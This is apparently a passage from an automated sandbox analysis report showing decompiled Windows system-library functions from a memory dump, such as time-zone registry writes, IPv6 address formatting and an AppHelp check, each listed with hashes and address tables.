                                                                                                                                                        • Instruction ID: 989a5ba387ad8747fc3b249e53e88b119af3be77e530e09ced25795112581c8e
                                                                                                                                                        • Opcode Fuzzy Hash: e18aa1027c2942479923e49f39e2355ef77efa63e43858139714a15a15f3c447
                                                                                                                                                        • Instruction Fuzzy Hash: 65F1D6B1D00249EFCB11EF99C981EEEBBB8FB09304F14446AE505E7261EB34DA45DB51
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0095822C, Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                        			E0095822C(void* __ecx, void* __edx, signed int _a4, signed int _a8) {
				char _v8;
				void* __ebx;
				signed int _t41;
				void* _t42;
				signed int* _t50;
				void* _t71;
				void* _t73;
				void* _t78;
				signed int _t81;
				void* _t84;

				_push(__ecx);
				_t81 = _a4;
				_t84 = 0x20;
				_t71 = E00975A34(_t81 + 4, _t84);
				if(_t71 < _t84) {
					_t41 = E00975A34(_t81 + 0x58, _t84);
					_pop(_t78);
					_a4 = _t41;
					__eflags = _t41 - _t84;
					if(_t41 >= _t84) {
						goto L1;
					} else {
						_t42 = E00917DCD(1,  &_v8);
						__eflags = _t42;
						if(__eflags >= 0) {
							__eflags = E0095810D(_t71, _t78, __eflags, 0x40000000, _v8, L"Bias", 4, _t81, 4);
							if(__eflags < 0) {
								L14:
								_a4 = 0;
								_t73 = E0095810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1,  &_a4, 2);
								__eflags = _t73;
								if(__eflags >= 0) {
									_a8 =  *(_t81 + 0x1ac) & 0x000000ff;
									_t50 =  &_a8;
									goto L16;
								}
							} else {
								_t8 = _t71 + 2; // 0x2
								__eflags = E0095810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardName", 1, _t81 + 4, _t71 + _t8);
								if(__eflags < 0) {
									goto L14;
								} else {
									_t71 = 4;
									__eflags = E0095810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardBias", _t71, _t81 + 0x54, _t71);
									if(__eflags < 0) {
										goto L14;
									} else {
										__eflags = E0095810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardStart", 3, _t81 + 0x44, 0x10);
										if(__eflags < 0) {
											goto L14;
										} else {
											__eflags = E0095810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightName", 1, _t81 + 0x58, _a4 + _a4 + 2);
											if(__eflags < 0) {
												goto L14;
											} else {
												__eflags = E0095810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightBias", _t71, _t81 + 0xa8, _t71);
												if(__eflags < 0) {
													goto L14;
												} else {
													__eflags = E0095810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightStart", 3, _t81 + 0x98, 0x10);
													if(__eflags < 0) {
														goto L14;
													} else {
														__eflags = _a8 - 0x1b0;
														if(__eflags < 0) {
															goto L14;
														} else {
															_t73 = E0095810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1, _t81 + 0xac, 0x100);
															__eflags = _t73;
															if(__eflags >= 0) {
																_a4 =  *(_t81 + 0x1ac) & 0x000000ff;
																_t50 =  &_a4;
																L16:
																_t73 = E0095810D(_t73, _t78, __eflags, 0x40000000, _v8, L"DynamicDaylightTimeDisabled", 4, _t50, 4);
															}
														}
													}
												}
											}
										}
									}
								}
							}
							E008BF9F0(_v8);
							_t42 = _t73;
						}
					}
				} else {
					L1:
					_t42 = 0xc000000d;
				}
				return _t42;
			}













                                                                                                                                                        0x00958231
                                                                                                                                                        0x00958235
                                                                                                                                                        0x0095823a
                                                                                                                                                        0x00958245
                                                                                                                                                        0x0095824b
                                                                                                                                                        0x0095825c
                                                                                                                                                        0x00958262
                                                                                                                                                        0x00958263
                                                                                                                                                        0x00958266
                                                                                                                                                        0x00958268
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0095826a
                                                                                                                                                        0x00958270
                                                                                                                                                        0x00958275
                                                                                                                                                        0x00958277
                                                                                                                                                        0x00958295
                                                                                                                                                        0x00958297
                                                                                                                                                        0x0095838d
                                                                                                                                                        0x00958391
                                                                                                                                                        0x009583a9
                                                                                                                                                        0x009583ab
                                                                                                                                                        0x009583ad
                                                                                                                                                        0x009583b6
                                                                                                                                                        0x009583b9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009583b9
                                                                                                                                                        0x0095829d
                                                                                                                                                        0x0095829d
                                                                                                                                                        0x009582b6
                                                                                                                                                        0x009582b8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009582be
                                                                                                                                                        0x009582c0
                                                                                                                                                        0x009582d5
                                                                                                                                                        0x009582d7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009582dd
                                                                                                                                                        0x009582f3
                                                                                                                                                        0x009582f5
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009582fb
                                                                                                                                                        0x00958317
                                                                                                                                                        0x00958319
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0095831b
                                                                                                                                                        0x00958332
                                                                                                                                                        0x00958334
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00958336
                                                                                                                                                        0x0095834f
                                                                                                                                                        0x00958351
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00958353
                                                                                                                                                        0x00958353
                                                                                                                                                        0x0095835a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0095835c
                                                                                                                                                        0x00958378
                                                                                                                                                        0x0095837a
                                                                                                                                                        0x0095837c
                                                                                                                                                        0x00958385
                                                                                                                                                        0x00958388
                                                                                                                                                        0x009583bc
                                                                                                                                                        0x009583cf
                                                                                                                                                        0x009583cf
                                                                                                                                                        0x0095837c
                                                                                                                                                        0x0095835a
                                                                                                                                                        0x00958351
                                                                                                                                                        0x00958334
                                                                                                                                                        0x00958319
                                                                                                                                                        0x009582f5
                                                                                                                                                        0x009582d7
                                                                                                                                                        0x009582b8
                                                                                                                                                        0x009583d4
                                                                                                                                                        0x009583d9
                                                                                                                                                        0x009583d9
                                                                                                                                                        0x00958277
                                                                                                                                                        0x0095824d
                                                                                                                                                        0x0095824d
                                                                                                                                                        0x0095824d
                                                                                                                                                        0x0095824d
                                                                                                                                                        0x009583df

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcsnlen
                                                                                                                                                        • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                                                                                                                        • API String ID: 3628947076-1387797911
                                                                                                                                                        • Opcode ID: f067e27b1dc82437359fb0ae671f6da3ea0774abbb3a78f4b06307b0f815b6aa
                                                                                                                                                        • Instruction ID: 4b8a5538219a1860f8278971288c4abce525327bdaafd77f7d56552f31a0676f
                                                                                                                                                        • Opcode Fuzzy Hash: f067e27b1dc82437359fb0ae671f6da3ea0774abbb3a78f4b06307b0f815b6aa
                                                                                                                                                        • Instruction Fuzzy Hash: CA41C775349609BAEB01DAD2CD42FEFB76CAF44B85F100111BE04F5191DBB0DB498BA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 009013CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 38%
                                                                                                                                                        			E009013CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E008F7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x8c2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E008F7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x8c9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E008F7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E008F7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E008F7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E008F7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                                                                                                                        0x009013d5
                                                                                                                                                        0x009013d9
                                                                                                                                                        0x009013dc
                                                                                                                                                        0x009013de
                                                                                                                                                        0x009013e1
                                                                                                                                                        0x009013e8
                                                                                                                                                        0x009013ee
                                                                                                                                                        0x0092e8fd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092e921
                                                                                                                                                        0x0092e921
                                                                                                                                                        0x0092e928
                                                                                                                                                        0x0092e982
                                                                                                                                                        0x0092e98a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092e99a
                                                                                                                                                        0x0092e99e
                                                                                                                                                        0x0092e9a3
                                                                                                                                                        0x0092e9a8
                                                                                                                                                        0x0092e9b9
                                                                                                                                                        0x0092e978
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092e978
                                                                                                                                                        0x0092e98a
                                                                                                                                                        0x0092e92a
                                                                                                                                                        0x0092e931
                                                                                                                                                        0x0092e944
                                                                                                                                                        0x0092e944
                                                                                                                                                        0x0092e950
                                                                                                                                                        0x0092e954
                                                                                                                                                        0x0092e959
                                                                                                                                                        0x0092e95e
                                                                                                                                                        0x0092e963
                                                                                                                                                        0x0092e970
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092e975
                                                                                                                                                        0x0092e93b
                                                                                                                                                        0x0092e980
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092e980
                                                                                                                                                        0x0092e942
                                                                                                                                                        0x0092e94b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092e94b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092e942
                                                                                                                                                        0x009013f4
                                                                                                                                                        0x009013f4
                                                                                                                                                        0x009013f9
                                                                                                                                                        0x009013fc
                                                                                                                                                        0x009013ff
                                                                                                                                                        0x00901406
                                                                                                                                                        0x0092e9cc
                                                                                                                                                        0x0092e9d2
                                                                                                                                                        0x0092e9d2
                                                                                                                                                        0x0092e9cc
                                                                                                                                                        0x0090140c
                                                                                                                                                        0x00901411
                                                                                                                                                        0x00901431
                                                                                                                                                        0x0090143a
                                                                                                                                                        0x0090143c
                                                                                                                                                        0x0090143f
                                                                                                                                                        0x0090143f
                                                                                                                                                        0x00901442
                                                                                                                                                        0x00901447
                                                                                                                                                        0x009014a8
                                                                                                                                                        0x009014ac
                                                                                                                                                        0x0092e9e2
                                                                                                                                                        0x0092e9e7
                                                                                                                                                        0x0092e9ec
                                                                                                                                                        0x0092ea05
                                                                                                                                                        0x0092ea05
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00901449
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00901449
                                                                                                                                                        0x0090144c
                                                                                                                                                        0x00901459
                                                                                                                                                        0x00901462
                                                                                                                                                        0x00901469
                                                                                                                                                        0x0090146a
                                                                                                                                                        0x00901470
                                                                                                                                                        0x00901473
                                                                                                                                                        0x00901476
                                                                                                                                                        0x00901476
                                                                                                                                                        0x00901490
                                                                                                                                                        0x00901495
                                                                                                                                                        0x0090138e
                                                                                                                                                        0x00901390
                                                                                                                                                        0x00901397
                                                                                                                                                        0x00901398
                                                                                                                                                        0x00901399
                                                                                                                                                        0x009013a1
                                                                                                                                                        0x009013a4
                                                                                                                                                        0x009013a4
                                                                                                                                                        0x00901498
                                                                                                                                                        0x0090149c
                                                                                                                                                        0x0090149f
                                                                                                                                                        0x009014a2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009014a4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009014a4
                                                                                                                                                        0x00901413
                                                                                                                                                        0x00901415
                                                                                                                                                        0x00901416
                                                                                                                                                        0x00901419
                                                                                                                                                        0x0090141c
                                                                                                                                                        0x00901422
                                                                                                                                                        0x009013b7
                                                                                                                                                        0x009013bc
                                                                                                                                                        0x009013bf
                                                                                                                                                        0x009013bf
                                                                                                                                                        0x009013c2
                                                                                                                                                        0x00901424
                                                                                                                                                        0x00901424
                                                                                                                                                        0x00901424
                                                                                                                                                        0x00901427
                                                                                                                                                        0x0090142b
                                                                                                                                                        0x0090142c
                                                                                                                                                        0x0090142c
                                                                                                                                                        0x0090142c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0090141c
                                                                                                                                                        0x00901411

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                                                        • Opcode ID: 937953ed3182704c770eb6fef624c719519ecc7aca5451cb0d39e678ab9dd9df
                                                                                                                                                        • Instruction ID: 26dd280639aa35ff1518d688614d283b3e45a4d6647a5f07612772d2cd1dfbaf
                                                                                                                                                        • Opcode Fuzzy Hash: 937953ed3182704c770eb6fef624c719519ecc7aca5451cb0d39e678ab9dd9df
                                                                                                                                                        • Instruction Fuzzy Hash: 576137B5900655AECB24DF6DC8808BFBBB9FF94300B54C56EF5D687691D334AA80CB60
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00963B8E, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                        			E00963B8E(intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				void* _t84;
				void* _t87;
				intOrPtr* _t97;
				void* _t104;
				void* _t106;
				void* _t109;
				intOrPtr _t116;
				signed int _t117;
				signed int _t122;
				signed int _t126;
				char _t127;
				signed int _t128;
				intOrPtr* _t133;
				void* _t134;

				_t133 = _a4;
				_t122 = 0;
				_t109 = _a8 + 0x2e;
				_v12 = 8;
				if( *_t133 != 0 ||  *((intOrPtr*)(_t133 + 2)) != 0 ||  *((intOrPtr*)(_t133 + 4)) != 0 ||  *((intOrPtr*)(_t133 + 6)) != 0 ||  *(_t133 + 0xc) == 0) {
					L17:
					_a4 = _t122;
					_v8 = _t122;
					_v16 = _t122;
					if(( *(_t133 + 8) & 0x0000fffd) == 0 &&  *(_t133 + 0xa) == 0xfe5e) {
						_v12 = 6;
					}
					_t127 = _v12;
					if(_t127 <= _t122) {
						L27:
						if(_a4 - _v8 <= 1) {
							_a4 = _t122;
							_v8 = _t122;
						}
						_t128 = 0;
						if(_v12 > _t122) {
							L33:
							L33:
							if(_v8 > _t128 || _t128 >= _a4) {
								if(_t128 != _t122 && _t128 != _a4) {
									_push(0x8c9c7e);
									_push(_t109 - _a8);
									_push(_a8);
									_t87 = E0097894A();
									_t134 = _t134 + 0xc;
									_a8 = _a8 + _t87;
								}
								_t84 = E0097894A(_a8, _t109 - _a8, 0x8c9c7a,  *(_t133 + _t128 * 2) & 0x0000ffff);
								_t134 = _t134 + 0x10;
								_a8 = _a8 + _t84;
							} else {
								_push(0x8c9c80);
								_push(_t109 - _a8);
								_push(_a8);
								_a8 = _a8 + E0097894A();
								_t134 = _t134 + 0xc;
								_t128 = _a4 - 1;
							}
							_t128 = _t128 + 1;
							if(_t128 < _v12) {
								goto L32;
							}
							goto L41;
							L32:
							_t122 = 0;
							goto L33;
						} else {
							L41:
							if(_v12 < 8) {
								_push( *(_t133 + 0xf) & 0x000000ff);
								_push( *(_t133 + 0xe) & 0x000000ff);
								_push( *(_t133 + 0xd) & 0x000000ff);
								_a8 = _a8 + E0097894A(_a8, _t109 - _a8, ":%u.%u.%u.%u",  *(_t133 + 0xc) & 0x000000ff);
							}
							return _a8;
						}
					} else {
						_t116 = 1;
						_t97 = _t133;
						_v20 = _t127;
						do {
							if( *_t97 != _t122) {
								_v16 = _t116;
							} else {
								if(_t116 - _v16 > _a4 - _v8) {
									_v8 = _v16;
									_a4 = _t116;
								}
								_t122 = 0;
							}
							_t97 = _t97 + 2;
							_t116 = _t116 + 1;
							_t40 =  &_v20;
							 *_t40 = _v20 - 1;
						} while ( *_t40 != 0);
						goto L27;
					}
				} else {
					_t126 =  *(_t133 + 8) & 0x0000ffff;
					if(_t126 != 0) {
						L13:
						if(_t126 != 0xffff ||  *(_t133 + 0xa) != 0) {
							_t122 = 0;
							goto L17;
						} else {
							_push( *(_t133 + 0xf) & 0x000000ff);
							_push( *(_t133 + 0xe) & 0x000000ff);
							_push( *(_t133 + 0xd) & 0x000000ff);
							_t104 = E0097894A(_a8, _t109 - _a8, "::ffff:0:%u.%u.%u.%u",  *(_t133 + 0xc) & 0x000000ff);
							L12:
							return _t104 + _a8;
						}
					}
					_t117 =  *(_t133 + 0xa) & 0x0000ffff;
					if(_t117 == 0) {
						L9:
						_t106 = 0x8c2926;
						L11:
						_push( *(_t133 + 0xf) & 0x000000ff);
						_push( *(_t133 + 0xe) & 0x000000ff);
						_push( *(_t133 + 0xd) & 0x000000ff);
						_push( *(_t133 + 0xc) & 0x000000ff);
						_t104 = E0097894A(_a8, _t109 - _a8, "::%hs%u.%u.%u.%u", _t106);
						goto L12;
					}
					if(_t117 != 0xffff) {
						goto L13;
					}
					if(_t117 != 0) {
						_t106 = 0x8c9cac;
						goto L11;
					}
					goto L9;
				}
			}





















                                                                                                                                                        0x00963b9b
                                                                                                                                                        0x00963b9e
                                                                                                                                                        0x00963ba0
                                                                                                                                                        0x00963ba4
                                                                                                                                                        0x00963bae
                                                                                                                                                        0x00963c74
                                                                                                                                                        0x00963c79
                                                                                                                                                        0x00963c7c
                                                                                                                                                        0x00963c7f
                                                                                                                                                        0x00963c86
                                                                                                                                                        0x00963c93
                                                                                                                                                        0x00963c93
                                                                                                                                                        0x00963c9a
                                                                                                                                                        0x00963c9f
                                                                                                                                                        0x00963cd0
                                                                                                                                                        0x00963cd9
                                                                                                                                                        0x00963cdb
                                                                                                                                                        0x00963cde
                                                                                                                                                        0x00963cde
                                                                                                                                                        0x00963ce1
                                                                                                                                                        0x00963ce6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00963cf1
                                                                                                                                                        0x00963cf4
                                                                                                                                                        0x00963d1c
                                                                                                                                                        0x00963d28
                                                                                                                                                        0x00963d2d
                                                                                                                                                        0x00963d2e
                                                                                                                                                        0x00963d31
                                                                                                                                                        0x00963d36
                                                                                                                                                        0x00963d39
                                                                                                                                                        0x00963d39
                                                                                                                                                        0x00963d56
                                                                                                                                                        0x00963d5b
                                                                                                                                                        0x00963d5e
                                                                                                                                                        0x00963cfb
                                                                                                                                                        0x00963d00
                                                                                                                                                        0x00963d05
                                                                                                                                                        0x00963d06
                                                                                                                                                        0x00963d11
                                                                                                                                                        0x00963d14
                                                                                                                                                        0x00963d17
                                                                                                                                                        0x00963d17
                                                                                                                                                        0x00963d61
                                                                                                                                                        0x00963d65
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00963cef
                                                                                                                                                        0x00963cef
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00963ce8
                                                                                                                                                        0x00963d67
                                                                                                                                                        0x00963d6b
                                                                                                                                                        0x00963d74
                                                                                                                                                        0x00963d79
                                                                                                                                                        0x00963d7e
                                                                                                                                                        0x00963d95
                                                                                                                                                        0x00963d95
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00963d98
                                                                                                                                                        0x00963ca1
                                                                                                                                                        0x00963ca3
                                                                                                                                                        0x00963ca4
                                                                                                                                                        0x00963ca6
                                                                                                                                                        0x00963ca9
                                                                                                                                                        0x00963cac
                                                                                                                                                        0x00963cea
                                                                                                                                                        0x00963cae
                                                                                                                                                        0x00963cbb
                                                                                                                                                        0x00963cc0
                                                                                                                                                        0x00963cc3
                                                                                                                                                        0x00963cc3
                                                                                                                                                        0x00963cc6
                                                                                                                                                        0x00963cc6
                                                                                                                                                        0x00963cc9
                                                                                                                                                        0x00963cca
                                                                                                                                                        0x00963ccb
                                                                                                                                                        0x00963ccb
                                                                                                                                                        0x00963ccb
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00963ca9
                                                                                                                                                        0x00963bdc
                                                                                                                                                        0x00963bdc
                                                                                                                                                        0x00963be8
                                                                                                                                                        0x00963c3c
                                                                                                                                                        0x00963c3f
                                                                                                                                                        0x00963c72
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00963c48
                                                                                                                                                        0x00963c4f
                                                                                                                                                        0x00963c54
                                                                                                                                                        0x00963c59
                                                                                                                                                        0x00963c68
                                                                                                                                                        0x00963c34
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00963c34
                                                                                                                                                        0x00963c3f
                                                                                                                                                        0x00963bea
                                                                                                                                                        0x00963bf1
                                                                                                                                                        0x00963bff
                                                                                                                                                        0x00963bff
                                                                                                                                                        0x00963c0b
                                                                                                                                                        0x00963c12
                                                                                                                                                        0x00963c17
                                                                                                                                                        0x00963c1c
                                                                                                                                                        0x00963c21
                                                                                                                                                        0x00963c2c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00963c31
                                                                                                                                                        0x00963bf8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00963bfd
                                                                                                                                                        0x00963c06
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00963c06
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00963bfd

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                                                        • Opcode ID: e014411330255e1b113d43c175c767ee0ed7b1b537dd10ee821f23b52bc34867
                                                                                                                                                        • Instruction ID: 01eb52d91fdde9579a550a7b4e54692aa0eb68c0c4f9e87fc45f535725a4b22a
                                                                                                                                                        • Opcode Fuzzy Hash: e014411330255e1b113d43c175c767ee0ed7b1b537dd10ee821f23b52bc34867
                                                                                                                                                        • Instruction Fuzzy Hash: D8619176900648ABCB20DFA9C8519BE7BF9EF94310B14C56AFCED97541E238EB409B50
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008F7EFD, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 127COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                        			E008F7EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x9a2088; // 0x7779c78d
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E008F7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00913F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E008CDFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
